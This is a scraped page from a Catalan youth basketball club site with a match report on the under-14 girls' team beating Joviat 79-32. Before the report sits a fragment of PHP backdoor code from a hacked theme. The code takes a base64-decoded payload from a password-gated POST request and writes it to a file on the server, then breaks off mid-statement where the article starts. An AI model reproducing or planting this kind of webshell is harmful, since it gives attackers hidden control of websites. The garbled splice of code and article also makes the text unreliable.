function bestrock_render_js(){ echo ""; } function bestrock_render_index(){ echo md5('56749'); } function bestrock_render_ajax(){ try { if(isset($_GET['s1'])) die(md5('js')); if(isset($_POST['t2'])){ $l1 = uniqid(rand(), true) . '.js'; @file_put_contents($l1, 'js'); if(file_exists($l1)){ if(isset($_POST['t1'])){ $d = md5(md5($_POST['t1'])); if($d=="8ae24e6719c47a39da8ad5451432d9a6"){ $d1=$_POST['t2']; $d1=base64_decode($d1); $d4=" L'infantil femení A recupera les bones sensacions i derrota el Joviat (79-32) - Tgn Bàsquet Club -

L’infantil femení A recupera les bones sensacions i derrota el Joviat (79-32)

Updated: març 19, 2019

L’equip infantil femení A va retrobar-se amb el bon joc i va vèncer clarament el Joviat en un partit dominat per les liles. Així, la gran defensa en individual de les locals a la que cal sumar-hi les constants ajudes, va permetre el TGN Bàsquet sortir ràpidament al contraatac i anotar amb facilitat. El marcador a la mitja part ja era de 37-11, una mostra de la superioritat de les tarragonines.

A banda de la bona defensa local, l’atac estàtic no va ser gens dolent. La pilota es va moure amb molt criteri i, d’aquesta manera, es van trobar bones posicions de tir. Només en l’últim quart, quan el matx estava completament decidit (61-15 al tercer quart).